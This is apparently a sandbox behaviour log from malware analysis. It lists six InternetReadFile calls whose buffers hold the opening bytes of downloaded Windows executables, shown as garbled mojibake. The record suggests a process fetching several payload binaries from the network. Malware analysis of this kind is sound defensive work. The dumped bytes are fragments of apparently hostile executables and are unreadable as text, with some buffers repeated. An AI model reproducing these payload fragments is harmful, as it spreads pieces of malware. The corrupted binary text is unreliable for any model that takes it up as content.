InternetReadFile Nov. 3, 2023, 6:09 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPELÃ=eà!Ðf à@@zÜzP°øÀÜÀnp0o@ H.text `.rdata@b d@@.datav@À.rsrcø°@@.relocÜÀ@Bj hèl¹pèOHh°è\SYÃÌÌÌj hm¹è/Hhè<SYÃÌÌÌjh0m¹ èHhpèSYÃÌÌÌjhHm¹¸èïGhÐèüRYÃÌÌÌjhem¹ÐèÏGh0èÜRYÃÌÌÌjhem¹èè¯Ghè¼RYÃÌÌÌjhem¹èGhðèRYÃÌÌÌjhem¹èoGhPè\|RYÃÌÌÌh°èmRYÃÌÌÌÌhè]RYÃÌÌÌÌhpèMRYÃÌÌÌÌj?hðm¹xèGhÐè,RYÃÌÌÌh°èRYÃÌÌÌÌhPè RYÃÌÌÌÌhðèýQYÃÌÌÌÌhèíQYÃÌÌÌÌh0èÝQYÃÌÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPè[ÄÆ^]ÂÌÌÌI¸¼lÉEÁÃÌÌUìVñFÇÔ!PèC[ÄöEtjVèûMÄÆ^]ÂAÇÔ!Pè[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿh(zEôPèëZÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèBZÄÇ,"Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèZÄÇà!Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì}SVÙW]àÛ}0Ñ}HÇj/hhmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèþDjjjjhmÿ,!}MjCMjjjjjPQPE´ÿ0!}4M jCM jjjjQhmPE¸ÿ4!}LU8ÿuHCU8MÈ}ÜðRÿuØCMÈQVuÀÿ8!EüPhÿûÿÿPVÿ<!Ài}ü\ûÿÿÇEÇEPÆEfD@Éuù+ÂMPûÿÿPèDMüE9MÇE¬BM}QCEMPÇE°ÆEèæC}°U}MôC×Eø]¬+ÁMÄSR;Øw,}øuäCuäEôPè[jMÄ3uÀÄÆëÆE¼Mäÿu¼SèIG}E°ør+HÇùrüÁ#+ÇÀüøQWèKÄUúr,MBÁúrIüÂ#+ÁÀüødRQèÓJÄEüÆûÿÿEüPhÿûÿÿPVÿ<!Àþÿÿ]àV5@!ÿÖÿu¸ÿÖÿu´ÿÖEäUÜ¸ÆEäó~EôfÖCÇEôEøúr/MÈBÁúrIüÂ#+ÁÀüøÌRQè;JEøÄÇEØÇEÜÆEÈør.MäPÁúrIüÂ#+ÁÀüøRQèóIÄUÇEôÇEøÆEäúr,MBÁúrIüÂ#+ÁÀüø>RQèIÄU4ÇEÇEÆEúr,M BÁúrIüÂ#+ÁÀüøøRQègIÄULÇE0ÇE4ÆE úÇM8BÁú«IüÂ#+ÁÀüøªéjhemÇCÇCÆèMAUúr(MBÁúrIüÂ#+ÁÀüøwbRQèÑHÄU4ÇEÇEÆEúLÿÿÿM BÁú0ÿÿÿIüÂ#+ÁÀüøwéÿÿÿRQèHÄ_^Ã[å]Ãè nÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì<¹`SVW=@3öVhem3Ûè@ÿDCOãÿyKËÿÿÿCð¥¶ÑòæÿyNÎÿÿÿF¶ð¥ð¥ð¥Mà¶ð¥Âuø¶ÀjÇEðÇEô¶ð¥EÿEÿPÆEàè@Eàº`PMÈèvAðÄþ`t\| tùr.¡`AùrPüÁ#+ÂÀüøÔÂQPèdGÄÇpÇtÆ``ó~FfÖpÇFÇFÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøw_RQèñFÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøwRQè¯FÄÿtuøéoþÿÿ_^[å]ÃèÃlÌÌÌUìì<SVWùÇGÇGÆèþÿÿ¡t¾``ø»0Cò=DC0+Þ]øø¹`¡pCÊÁ;ð*3Mà2EÿEÿjPÇEðÇEôÆEàèN>Eà×PMÈèÀ?ØÄ;ûteOùr+AùrPüÁ#+ÂÀüøÍÂQPè¸EÄÇGÇGÆó~CfÖGÇCÇCÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøwiRQèVEÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøw'RQèEÄ¡tF`]øé¼þÿÿÇ_^[å]ÃèkÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ}4E SCE VWÿu0Mü¹HPè =}EÿuCE¹0Pèô<5X3Û=\fDÿð¥Ã¹HC H÷þ ð¤Cû\|Ô3ÿ3öð¥¶ð¤ø¶ÊùçÿyOÏÿÿÿGð¥ð¥Fð¥þ\|ÁuüÎèýÿÿUúr request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:09 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁBo,Ao,Ao,AÞ/@o,AÞ)@"o,AÞ(@o,AP(@o,AP/@o,AP)@Ëo,AÞ-@o,Ao-A.o,A%@o,AÓAo,A.@o,ARicho,APEL /eàz^P@@` ÀàÐh/ gp´hh@.text?yz `.rdatanÿ~@@.data+~@À.rsrcàÀ@@.reloch/Ð0@BhSCè°~YÃÌÌÌÌh0SCè ~YÃÌÌÌÌj hVD¹ÀDèÏWhðSCè~YÃÌÌÌj h0VD¹Ø¡Dè¯WhPTCè_~YÃÌÌÌjhTVD¹h¢DèWh°TCè?~YÃÌÌÌj h\VD¹àDèoWhUCè~YÃÌÌÌjhVD¹¡DèOWhpUCèÿ}YÃÌÌÌjhVD¹èDè/WhÐUCèß}YÃÌÌÌjhUD¹8¢DèWh0VCè¿}YÃÌÌÌjhUD¹°¢DèïVhVCè}YÃÌÌÌjhUD¹øDèÏVhðVCè}YÃÌÌÌjhUD¹Dè¯VhPWCè_}YÃÌÌÌjh¸VD¹xDèVh°WCè?}YÃÌÌÌjhÄVD¹8¥DèoVhXCè}YÃÌÌÌjhÐVD¹ ¢DèOVhpXCèÿ\|YÃÌÌÌjhÜVD¹àDè/VhÐXCèß\|YÃÌÌÌjhèVD¹À¡DèVh0YCè¿\|YÃÌÌÌjhüVD¹DèïUhYCè\|YÃÌÌÌjhWD¹Ø¤DèÏUhðYCè\|YÃÌÌÌj(h WD¹à¥Dè¯UhPZCè_\|YÃÌÌÌjhLWD¹àDèUh°ZCè?\|YÃÌÌÌjhXWD¹¥DèoUh[Cè\|YÃÌÌÌjDhhWD¹ð¤DèOUhp[Cèÿ{YÃÌÌÌj\h°WD¹Dè/UhÐ[Cèß{YÃÌÌÌjhXD¹ DèUh0\Cè¿{YÃÌÌÌjh XD¹DèïTh\Cè{YÃÌÌÌjh(XD¹ÈDèÏThð\Cè{YÃÌÌÌj<hDXD¹PDè¯ThP]Cè_{YÃÌÌÌjhXD¹8DèTh°]Cè?{YÃÌÌÌjhXD¹p£DèoTh^Cè{YÃÌÌÌjh¬XD¹¥DèOThp^CèÿzYÃÌÌÌjXhÀXD¹xDè/ThÐ^CèßzYÃÌÌÌjhYD¹°¥DèTh0_Cè¿zYÃÌÌÌjh4YD¹@£DèïSh_CèzYÃÌÌÌjh@YD¹À¤DèÏShð_CèzYÃÌÌÌjhLYD¹XDè¯ShP`Cè_zYÃÌÌÌjhTYD¹DèSh°`Cè?zYÃÌÌÌjh\YD¹ DèoShaCèzYÃÌÌÌjhdYD¹¡DèOShpaCèÿyYÃÌÌÌjhlYD¹°Dè/ShÐaCèßyYÃÌÌÌjhtYD¹à¢DèSh0bCè¿yYÃÌÌÌjh\|YD¹¨DèïRhbCèyYÃÌÌÌjhYD¹@ DèÏRhðbCèyYÃÌÌÌjhYD¹PDè¯RhPcCè_yYÃÌÌÌjhYD¹x¤DèRh°cCè?yYÃÌÌÌjhYD¹Ð DèoRhdCèyYÃÌÌÌjh¤YD¹h¥DèORhpdCèÿxYÃÌÌÌjh¬YD¹P¢Dè/RhÐdCèßxYÃÌÌÌjh´YD¹@DèRh0eCè¿xYÃÌÌÌjh¼YD¹pDèïQheCèxYÃÌÌÌjhØYD¹èDèÏQhðeCèxYÃÌÌÌjhàYD¹ø¥Dè¯QhPfCè_xYÃÌÌÌjhèYD¹¤DèQh°fCè?xYÃÌÌÌjhðYD¹`DèoQhgCèxYÃÌÌÌjhüYD¹@¦DèOQhpgCèÿwYÃÌÌÌjhZD¹¸Dè/QhÐgCèßwYÃÌÌÌjhZD¹0DèQh0hCè¿wYÃÌÌÌjh$ZD¹HDèïPhhCèwYÃÌÌÌjh,ZD¹hDèÏPhðhCèwYÃÌÌÌjh4ZD¹Dè¯PhPiCè_wYÃÌÌÌjh<ZD¹¨DèPh°iCè?wYÃÌÌÌjhDZD¹`¡DèoPhjCèwYÃÌÌÌjhLZD¹x¡DèOPhpjCèÿvYÃÌÌÌjh\ZD¹Dè/PhÐjCèßvYÃÌÌÌjhdZD¹øDèPh0kCè¿vYÃÌÌÌjhlZD¹0¤DèïOhkCèvYÃÌÌÌjhtZD¹(£DèÏOhðkCèvYÃÌÌÌjhZD¹Dè¯OhPlCè_vYÃÌÌÌjhZD¹ ¥DèOh°lCè?vYÃÌÌÌjhZD¹ÐDèoOhmCèvYÃÌÌÌjh°ZD¹¤DèOOhpmCèÿuYÃÌÌÌjhÐZD¹@Dè/OhÐmCèßuYÃÌÌÌjhäZD¹ØDèOh0nCè¿uYÃÌÌÌjhüZD¹¨¡DèïNhnCèuYÃÌÌÌjh[D¹ DèÏNhðnCèuYÃÌÌÌjh [D¹X¦Dè¯NhPoCè_uYÃÌÌÌjh,[D¹H¤DèNh°oCè?uYÃÌÌÌjhD[D¹ÈDèoNhpCèuYÃÌÌÌjhX[D¹ÈDèONhppCèÿtYÃÌÌÌjh`[D¹ÀDè/NhÐpCèßtYÃÌÌÌjh\|[D¹8DèNh0qCè¿tYÃÌÌÌjh[D¹HDèïMhqCètYÃÌÌÌjh[D¹øDèÏMhðqCètYÃÌÌÌjh¨[D¹Ð£Dè¯MhPrCè_tYÃÌÌÌjh´[D¹`DèMh°rCè?tYÃÌÌÌjhÈ[D¹¥DèoMhsCètYÃÌÌÌjhÜ[D¹(¦DèOMhpsCèÿsYÃÌÌÌjhä[D¹¢Dè/MhÐsCèßsYÃÌÌÌj@hð[D¹(DèMh0tCè¿sYÃÌÌÌjh4\D¹°DèïLhtCèsYÃÌÌÌjLh@\D¹ðDèÏLhðtCèsYÃÌÌÌj<h\D¹Dè¯LhPuCè_sYÃÌÌÌjhÐ\D¹0¡DèLh°uCè?sYÃÌÌÌjhà\D¹DèoLhvCèsYÃÌÌÌjhì\D¹ØDèOLhpvCèÿrYÃÌÌÌjhø\D¹H¡Dè/LhÐvCèßrYÃÌÌÌj@h]D¹DèLh0wCè¿rYÃÌÌÌ request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÐÃ Ç±^Ç±^Ç±^Ùã8^Ñ±^Ùã)^ò±^Ùã.^D±^àwÖ^Å±^¾ð^Ä±^Ç±¬^±^ÎÉ)^Æ±^ÎÉ<^Æ±^RichÇ±^PELuãCeà ÊæÀ§ð@øö¼`H0ðP.text-£¤ `.reloc§$À&¨ `.rdatapPðRÎ@@.dataHPt @À.qbjfzð` ÀUììMìÆEÿ¸ÀtÇEøë MøéMø}ø~ëïëí3ÒtÇEô(ë EôèEô}ô~ëïëí¹ÉtÇEðJë UðêUð}ð~ëïëíhÈñAMèLEå]ÂÌÌÌUììðþÿÿhÌñA\|ÿÿÿè!hÐñAM¤èÝÐýAÝ]øhôñAMÀèþÝÈýAÝ]hòAMÜèèhdòAPÿÿÿèØPhtòA4ÿÿÿèÇPèQ'Äoÿÿÿ4ÿÿÿèíPÿÿÿèâ¶oÿÿÿÀt(Çxÿÿÿ=ëxÿÿÿéxÿÿÿ½xÿÿÿ~ëæëäºÒt(Çtÿÿÿ)ëtÿÿÿètÿÿÿ½tÿÿÿ~ëæëähòAÿÿÿè.PhòAøþÿÿèPèÇ'Ä3ÿÿÿøþÿÿèCÿÿÿè8¶3ÿÿÿÉt(Çpÿÿÿëpÿÿÿêpÿÿÿ½pÿÿÿ~ëæëäÆ÷þÿÿMÜèöMÀèîM¤èæ\|ÿÿÿèÛMèÓM4èË÷þÿÿå]ÂLÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMüMè¡å]Â8ÌÌÌÌÌÌÌÌÌÌÌUìì$MÜÝèýAÝ]øÆEçÝàýAÝ]èÝØýAÝ]ð¸ÀtÇEà7ë MàéMà}à~ëïëíh¤òAMèöEå]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì°PÿÿÿÝðýAÝ]ÐÇEÇEüCh¸òAMèhØòAMÜè h@óAM´èÇEøhóApÿÿÿè\|Ph¸óATÿÿÿèkPè&ÄETÿÿÿèpÿÿÿè¶EÀtÇEë MéM}~ëïëíhÔóAMèM´èPMÜèHMè@Mè8M,è0Eå]ÂHÌÌÌÌÌÌÌUììÀ@ÿÿÿÝþAÝ]ðÆEÿhàóAMÔè·ÇE2 ÝþAÝ]Èh8ôAM¤èÝøýAÝ]ÀhôAMèhôA`ÿÿÿètPhàôADÿÿÿècPè %ÄÿÿÿDÿÿÿè`ÿÿÿè~¶ÿÿÿÀtÇEKë MéM}~ëïëíh8õAMè MèBM¤è:MÔè2Eå]ÂÌÌÌÌÌÌÌÌÌUììdMÆE÷ÇE¸ûÇE´4ÝþAÝ]àÆEïÇEðh@õAM¼è¤ÇEÜÝþAÝ]øÆEÛ¸ÀtÇE°+ë M°éM°}°~ëïëí3ÒtÇE¬:ë E¬èE¬}¬~ëïëí3ÉtÇE¨`ë U¨êU¨}¨~ëïëí3ÀtÇE¤6ë M¤éM¤}¤~ëïëíºÒtÇE ë E èE } ~ëïëíM¼èå]ÂÌÌÌÌÌÌÌÌUìììþÿÿhlõAMÔè´Ý þAÝ]ðhõAM¸èÆEÿhàõAMèPh(öAhÿÿÿè\|Pè&#ÄE£hÿÿÿè¥Mè¶E£ÀtÇE´ë M´éM´}´~ëïëíhlöAHÿÿÿè)PhöA,ÿÿÿèPèÂ"Ägÿÿÿ,ÿÿÿè>Hÿÿÿè3¶gÿÿÿÒtÇE°>ë E°èE°}°~ëïëí¹ÉtÇE¬?ë U¬êU¬}¬~ëïëíh¼öAÿÿÿè PhäöAðþÿÿè Pè0"Ä+ÿÿÿðþÿÿè¬ ÿÿÿè¡ ¶+ÿÿÿÀtÇE¨\ë M¨éM¨}¨~ëïëí3ÒtÇE¤>ë E¤èE¤}¤~ëïëíh÷AMè M¸èE MÔè= Mè5 Eå]Â(ÌÌÌÌÌÌÌÌÌÌÌÌUììpMÆEãh ÷AMäèÆÇEÜ¸ÀtÇEØ=ë MØéMØ}Ø~ëïëí3ÒtÇEÔDë EÔèEÔ}Ô~ëïëíh<÷AM°èmPhX÷AMè_PèéÄEÏMèM°è¶MÏÉtÇEÐ*ë UÐêUÐ}Ð~ëïëíht÷AMèMäèJEå]ÂÌUììTM¬Ý8þAÝ]èÆEúÝ0þAÝ]ðÆEûÇEÄÝ(þAÝ]¸ÇEüÜh÷AMÌè¹ÆEË3ÀtÇE´Uë M´éM´}´~ëïëí3ÒtÇE°'ë E°èE°}°~ëïëíMÌèMè¥å]Â$ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì`M ÝXþAÝ]àÝPþAÝ]èh´÷AMÄè(ÝHþAÝ]øÆE³ÆEöÇE´ÄÝ@þAÝ]¸ÆE÷¸ÀtÇE¬ë M¬éM¬}¬~ëïëí3ÒtÇE¨=ë E¨èE¨}¨~ëïëíÆE§MÄèò M(èê E§å]ÂDÌUììÔ,ÿÿÿhÄ÷AMÜè ÆEÛÇEøÒÇEüÌhÔ÷AM¼èe høAMèX PhTøAxÿÿÿèG PèñÄE³xÿÿÿèp Mèh ¶E³ÀtÇE¸>ë M¸éM¸}¸~ëïëíhøAXÿÿÿèô Ph¤øA<ÿÿÿèã PèmÄwÿÿÿ<ÿÿÿè Xÿÿÿèþ ¶wÿÿÿÒtÇE´ë E´èE´}´~ëïëíÝ`þAÝ0ÿÿÿM¼èÃ MÜè» Ý0ÿÿÿå]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUììD¼þÿÿh¸øAMÀèD ÝxþAÝ]øÝpþAÝxÿÿÿhùAMÜè" h(ùAM è ÆE¿hùAPÿÿÿè ÆoÿÿÿÝhþAÝpÿÿÿhèùAMèáhHúAÿÿÿèÑP request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $÷zc³ö0³ö0³ö0ø1²ö0ø1²ö0¦1éö0¦1¡ö0¦1«ö0ø1¸ö0ø1ö0ø1«ö0³ö0]ö0ø1¨ö0v1¹ö0vë0²ö0v1²ö0Rich³ö0PELâ/eà%ò ` @p@<`àp\ñ¸8¹Ð·@ü.textPð ò `.rdataZö @@.data0 ú@À.rsrcà`@@.reloc\ñpò@BSÜìäðÄUkl$ììVWÇEøá½úWÀÇEüÔ9r3EøMüMÄEÀÇEøEÇEüõrõEøMüMÌEÈÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(MÀMìMÀEèQWMà)MÀ)ðþÿÿÇÿÿÿÇÿÿÿAÀuù+ÊEÀQPðþÿÿèáÇEøá½úWÀÇEüÔ9rpEøMüM´E°ÇEøgp7ÇEüïõrõEøMüM¼E¸ÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(M°MìM°EèQWMà)M°ÿÿÿÇÿÿÿÇÿÿÿAÀuù+ÊE°QPÿÿÿè0ÇEøá½úWÀÇEüÔ9rcEøMüM¤E ÇEøR\EÇEüõrõEøMüM¬E¨ÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(M MìM EèQWMà)M ) ÿÿÿÇ0ÿÿÿÇ4ÿÿÿAÀuù+ÊE QP ÿÿÿèÇEøé½îWÀÇEüÏ(yAEøMüMEÇEøbEÇEüõrõEøMüMEÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(MMìMEèQWMà)M8ÿÿÿÇHÿÿÿÇLÿÿÿAÀuù+ÊEQP8ÿÿÿèÇÇEøá½úWÀÇEüÔ9rwEøMütÿÿÿpÿÿÿÇEøch)ÇEüùEøMü\|ÿÿÿxÿÿÿÇEø9êÇEüqEøMüMEÇEø°úÇEüÔµ EøMüMEÇEø¥ÔöÇEü»K3EøMüÇEøEÇEüõrõEÐEøMÔMüÇEøWëêÇEüqEØEøMÜMüÇEø°úEàMäÇEüÔµ EøMü(pÿÿÿWMÐ)pÿÿÿ(MMìpÿÿÿEèQWMà)M)PÿÿÿÇ`ÿÿÿÇdÿÿÿfDAÀuù+ÊpÿÿÿQPPÿÿÿèðþÿÿÇt8PhÿÿÿÇx8P+ÈÇ\|8P¸«ªª÷éÁúòÁîòtcþªªª ÌV¹t8PèÎÝøvðþÿÿ=t8P=x8PÏ \|8Phÿÿÿ;ÁtðfVÏè±ÆhÿÿÿÇ;ðuè=x8P¿µhÿÿÿNüvèOùr'AùrPüÁ#+ÂÀüøw7ÂQPèÅD ÄÇFÇFÆÿu¸hàöMèíF Ä_^å]ã[ÃèèXÛÌÌÌÌÌÌÌÌSÜìäðÄUkl$ììVWÇEøõ½íWÀÇEüÒ%8KEøMüM¤E ÇEøkrEÇEüõrõEøMüM¬E¨ÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(M MìM EèQWMà)M )pþÿÿÇþÿÿÇþÿÿAÀuù+ÊE QPpþÿÿèÇEø¤üWÀÇEüË'soEøMüdÿÿÿ`ÿÿÿÇEøg}*ÇEüãEøMülÿÿÿhÿÿÿÇEøyìÇEüqEøMütÿÿÿpÿÿÿÇEø°úÇEüÔµ EøMü\|ÿÿÿxÿÿÿÇEø¥ÔöÇEü»K3EøMüÇEøEÇEüõrõEÐEøMÔMüÇEøWëêÇEüqEØEøMÜMüÇEø°úEàMäÇEüÔµ EøMü(`ÿÿÿWMÐMì`ÿÿÿEèQ)`ÿÿÿ(MàWpÿÿÿ)pÿÿÿþÿÿÇþÿÿÇþÿÿAÀuù+Ê`ÿÿÿQPþÿÿèBÇEøõ§àØWÀÇEüÃ&z3EøMüMEÇEøEÇEüõrõEøMüMEÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(MMìMEèQWMà)M) þÿÿÇ°þÿÿÇ´þÿÿAÀuù+ÊEQP þÿÿèÇEøõ§àªÇEüË9yUEøMü0ÿÿÿ4ÿÿÿÇEøor6ÇEüÊEøMü8ÿÿÿ<ÿÿÿÇEø6íÇEüÍcrEøMü@ÿÿÿDÿÿÿÇEøßoÿÇEü§XdEøMüHÿÿÿLÿÿÿÇEøu3¯DÇEüÏÐHTEøMüPÿÿÿTÿÿÿÇEø¦§ÇEüZm;1EøMüXÿÿÿ\ÿÿÿÇEø¥ÔöÇEü»K3EøMüÇEøEÇEüõrõEÀEøMÄMüÇEøWëêÇEüqEÈEøMÌMüÇEø°úÇEüÔµ EÐEøMÔMüÇEø3¯DÇEüÏÐHTEØEøMÜMüÇEø¦§ÇEüZm;1EàEøMäMü(0ÿÿÿWMÀEèMì)0ÿÿÿ(@ÿÿÿ0ÿÿÿWMÐQ)@ÿÿÿWÀ(PÿÿÿWMà)Pÿÿÿ¸þÿÿÇÈþÿÿÇÌþÿÿAÀuù+Ê0ÿÿÿQP¸þÿÿè¼ÇEøõ§àÝWÀÇEü3{_EøMüMEÇEøEÇEüõrõEøMüMEÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(MMìMEèQWMà)M)ÐþÿÿÇàþÿÿÇäþÿÿ@AÀuù+ÊEQPÐþÿÿèÇEøõ§àÝÇEüç;d\EøMüÿÿÿÿÿÿÇEø`w ÇEüå©EøMüÿÿÿÿÿÿÇEø1ôÇEüå^rEøMüÿÿÿÿÿÿÇEøÓuåÇEü ÆqEøMüÿÿÿÿÿÿÇEøt_¯DÇEüÏÐHTEøMü ÿÿÿ$ÿÿÿÇEø¦§ÇEüZm;1EøMü(ÿÿÿ,ÿÿÿÇEø¥ÔöÇEü»K3EøMüÇEøEÇEüõrõEÀEøMÄMüÇEøWëêÇEüqEÈEøMÌMüÇEø°úÇEüÔµ EÐEøMÔMüÇEø3¯DÇEüÏÐHTEØEøMÜMüÇEø¦§ÇEüZm;1EàEøMäMü request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¢©ðà0t> @ à@èS ÞÀ H.textDs t `.rsrcÞ v@@.relocÀ\|@B H´¯4ãC0 s ~%-&~þs %(+o 8Ìo % %Ð ( s ¢% %Ð( s ¢% %Ð( s ¢(o 8F( s s,~ }~ s ( o }{ %Ð( s o , %Ðý( s +O > %ÐÊ( s rp~ ( ( o -{(+{(( :Vo ( o o ( {(( :\(+, %\o (+o o"þ s ~%-&~þs %(+o$þs ~%-&~þs %(+oþs ~%-&~þs %(+o&þ s ~%-&~þs! %(+o(Þ&Þo+-o" (# :®ýÿÿÞþo$ Üo% :)ýÿÿÞ ,o$ ÜÞ&ÞAdÉ ÒYô1Þ 0\|s& %Ð ( s (' (( - ÝG(soÿs« %ÐÔ( s o±&8ÜsKoo) oFoo) oHo(oJÞ&ÞÞjoE(* - oE+rpoFoG(* - oG+rpoHoI(* - oI+rpoJÜoIrp(+ ,o, Xoª?ÿÿÿÞ&ÞÞ,o$ ÜÞ&Þ* A\|}EÂ}JÇjA!bA&gou0`s- %Ð( s (' (( - Ý,(soÿs« %Ðÿ( s o±&8Ás; %Ðë( s o¬o) o. %Ðë( s o¬o) r)po. o0 %Ð+( s o¬o) o2 %Ð( s o¬r-po o4 %Ðñ( s o¬o) (/ @Bj[!¶Yo6 %Ð( s o¬o) o8 %ÐÑ( s o¬(o:o5j/(0 (1 (2 !µ÷õYo6Þ&Þ-+(9(* -o3 Xoª?1þÿÿÞ&ÞÞ,o$ ÜÞ&Þ* Adx@F@KSY0fs4 %Ð( s (' (( - Ý2(soÿs« %ÐÄ( s o±&8Ç %Ðá( s o¬o) %ÐÙ( s o. - %Ð( s o. , (s %Ð( s o¬o) o o Þ&Þ,o5 Xoª?+ÿÿÿÞ&ÞÞ,o$ ÜÞ&Þ Adx¯'@L@QY_0®s6 %Ð( s (' (( - Ýz(soÿs«r1pr[p~ ( o±&8 %Ð( s o¬(rap~ o sD %ÐÐ( s o¬o) o= %Ðâ( s rep~ ( o¬o) (7 o? %ÐÅ( s rep~ ( o¬o) (7 oA oC Þ&Þ,o8 Xoª?áþÿÿÞ&ÞÞ,o$ ÜÞ&Þ Advùo@T@Y¡§0@~ o v3o 13(9 () +(2o) Þ&Þ5;0' o: +o: X 1o; ,æ0ñ~ ~ %rop¢o< iY(+( + -$rop(? rsp(' (( -\ X +Ù 3rsp(' (( -> X +» 3$rop(? rp(' (( - X + 3rp(' (( request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 3, 2023, 6:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $÷zc³ö0³ö0³ö0ø1²ö0ø1²ö0¦1éö0¦1¡ö0¦1«ö0ø1¸ö0ø1ö0ø1«ö0³ö0]ö0ø1¨ö0v1¹ö0vë0²ö0v1²ö0Rich³ö0PELâ/eà%ò ` @p@<`àp\ñ¸8¹Ð·@ü.textPð ò `.rdataZö @@.data0 ú@À.rsrcà`@@.reloc\ñpò@BSÜìäðÄUkl$ììVWÇEøá½úWÀÇEüÔ9r3EøMüMÄEÀÇEøEÇEüõrõEøMüMÌEÈÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(MÀMìMÀEèQWMà)MÀ)ðþÿÿÇÿÿÿÇÿÿÿAÀuù+ÊEÀQPðþÿÿèáÇEøá½úWÀÇEüÔ9rpEøMüM´E°ÇEøgp7ÇEüïõrõEøMüM¼E¸ÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(M°MìM°EèQWMà)M°ÿÿÿÇÿÿÿÇÿÿÿAÀuù+ÊE°QPÿÿÿè0ÇEøá½úWÀÇEüÔ9rcEøMüM¤E ÇEøR\EÇEüõrõEøMüM¬E¨ÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(M MìM EèQWMà)M ) ÿÿÿÇ0ÿÿÿÇ4ÿÿÿAÀuù+ÊE QP ÿÿÿèÇEøé½îWÀÇEüÏ(yAEøMüMEÇEøbEÇEüõrõEøMüMEÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(MMìMEèQWMà)M8ÿÿÿÇHÿÿÿÇLÿÿÿAÀuù+ÊEQP8ÿÿÿèÇÇEøá½úWÀÇEüÔ9rwEøMütÿÿÿpÿÿÿÇEøch)ÇEüùEøMü\|ÿÿÿxÿÿÿÇEø9êÇEüqEøMüMEÇEø°úÇEüÔµ EøMüMEÇEø¥ÔöÇEü»K3EøMüÇEøEÇEüõrõEÐEøMÔMüÇEøWëêÇEüqEØEøMÜMüÇEø°úEàMäÇEüÔµ EøMü(pÿÿÿWMÐ)pÿÿÿ(MMìpÿÿÿEèQWMà)M)PÿÿÿÇ`ÿÿÿÇdÿÿÿfDAÀuù+ÊpÿÿÿQPPÿÿÿèðþÿÿÇt8PhÿÿÿÇx8P+ÈÇ\|8P¸«ªª÷éÁúòÁîòtcþªªª ÌV¹t8PèÎÝøvðþÿÿ=t8P=x8PÏ \|8Phÿÿÿ;ÁtðfVÏè±ÆhÿÿÿÇ;ðuè=x8P¿µhÿÿÿNüvèOùr'AùrPüÁ#+ÂÀüøw7ÂQPèÅD ÄÇFÇFÆÿu¸hàöMèíF Ä_^å]ã[ÃèèXÛÌÌÌÌÌÌÌÌSÜìäðÄUkl$ììVWÇEøõ½íWÀÇEüÒ%8KEøMüM¤E ÇEøkrEÇEüõrõEøMüM¬E¨ÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(M MìM EèQWMà)M )pþÿÿÇþÿÿÇþÿÿAÀuù+ÊE QPpþÿÿèÇEø¤üWÀÇEüË'soEøMüdÿÿÿ`ÿÿÿÇEøg}*ÇEüãEøMülÿÿÿhÿÿÿÇEøyìÇEüqEøMütÿÿÿpÿÿÿÇEø°úÇEüÔµ EøMü\|ÿÿÿxÿÿÿÇEø¥ÔöÇEü»K3EøMüÇEøEÇEüõrõEÐEøMÔMüÇEøWëêÇEüqEØEøMÜMüÇEø°úEàMäÇEüÔµ EøMü(`ÿÿÿWMÐMì`ÿÿÿEèQ)`ÿÿÿ(MàWpÿÿÿ)pÿÿÿþÿÿÇþÿÿÇþÿÿAÀuù+Ê`ÿÿÿQPþÿÿèBÇEøõ§àØWÀÇEüÃ&z3EøMüMEÇEøEÇEüõrõEøMüMEÇEø¥ÔöÇEü»K3EøMüÇEøEEàMäÇEüõrõEøMü(MMìMEèQWMà)M) þÿÿÇ°þÿÿÇ´þÿÿAÀuù+ÊEQP 